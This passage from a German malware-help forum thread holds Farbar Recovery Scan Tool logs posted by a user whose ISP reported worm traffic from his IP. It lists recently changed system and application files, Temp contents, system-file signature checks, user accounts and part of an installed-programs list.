2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-11 20:53 - 2017-06-20 07:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-11 20:53 - 2017-06-20 07:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-07-11 20:53 - 2017-06-20 06:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-11 20:53 - 2017-06-20 06:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-09 18:39 - 2017-07-09 18:55 - 000000000 ____D C:\Users\****\Documents\SimCity
2017-07-09 18:26 - 2017-07-09 18:59 - 000001008 _____ C:\Users\Public\Desktop\SimCity™.lnk
2017-07-09 18:26 - 2017-07-09 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-06 01:14 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-06 01:14 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Roaming\Spotify
2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Local\Spotify
2017-08-06 01:11 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-06 01:11 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-06 01:11 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2
2017-08-06 00:58 - 2017-04-19 20:20 - 003861696 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-06 00:58 - 2017-03-20 06:35 - 001882280 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-06 00:58 - 2017-03-20 06:35 - 000473418 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-06 00:53 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-06 00:52 - 2017-04-19 20:10 - 000000000 ____D C:\Users\****
2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk
2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\****\AppData\Roaming\MyPhoneExplorer
2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit
2017-08-06 00:19 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit
2017-08-06 00:19 - 2015-03-15 23:24 - 000000000 ____D C:\Users\****\AppData\Roaming\IObit
2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\****\AppData\Local\Battle.net
2017-08-06 00:02 - 2015-03-09 00:28 - 000000000 ____D C:\Users\****\AppData\Local\Ubisoft Game Launcher
2017-08-05 23:39 - 2016-01-03 14:51 - 000000000 ____D C:\Users\****\AppData\Local\CrashDumps
2017-08-05 23:31 - 2015-03-01 21:28 - 000000000 ____D C:\Users\****\AppData\Roaming\Skype
2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games
2017-08-05 23:17 - 2015-03-15 23:24 - 000000000 ____D C:\ProgramData\ProductData
2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-08-05 22:55 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-05 01:39 - 2015-04-10 22:33 - 000000000 ____D C:\Users\****\AppData\Roaming\TS3Client
2017-08-05 00:32 - 2015-02-07 15:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Dropbox
2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-03 02:07 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\****\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\****\Dropbox
2017-08-01 12:29 - 2017-05-17 19:05 - 000000000 ____D C:\Users\****\AppData\Local\b95cd
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\****\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\****\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\****\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\****\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-31 19:59 - 2015-02-06 18:49 - 000000000 ____D C:\Users\****\AppData\Local\Packages
2017-07-31 19:41 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Local\Discord
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-24 19:38 - 2015-02-06 20:39 - 000000000 ____D C:\Users\****\AppData\Local\Turbine
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 19:33 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-11 20:56 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-11 20:54 - 2015-02-06 20:57 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-07 22:12 - 2017-03-31 20:13 - 000000000 ____D C:\Users\****\AppData\Local\Warframe

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\****\AppData\Local\recently-used.xbel
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-11-02 23:41 - 2015-11-02 23:41 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat


Einige Dateien in TEMP:
====================
2017-08-06 00:26 - 2017-08-06 00:26 - 000066048 _____ () C:\Users\****\AppData\Local\Temp\Execute2App.exe
2017-08-05 23:51 - 2017-05-12 00:34 - 000037376 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
2017-08-05 23:51 - 2017-05-12 00:03 - 000020480 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiRezLauncherControls.dll
2017-08-06 00:27 - 2017-08-06 00:27 - 000740416 _____ (Oracle Corporation) C:\Users\****\AppData\Local\Temp\jre-8u144-windows-au.exe
2017-08-06 00:26 - 2016-12-09 09:03 - 000568832 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcp90.dll
2017-08-06 00:26 - 2016-12-09 09:03 - 000655872 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcr90.dll

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-01 03:15

==================== Ende von FRST.txt ============================
         
__________________

Alt 06.08.2017, 00:28   #19
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Und die andere. Hoffe dass die jetzt in eine Datei passt..

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 31-07-2017
durchgeführt von ***** (06-08-2017 01:16:42)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 31.4.25 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version:  - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version:  - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version:  - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version:  - Bethesda Game Studios)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version:  - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.78 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
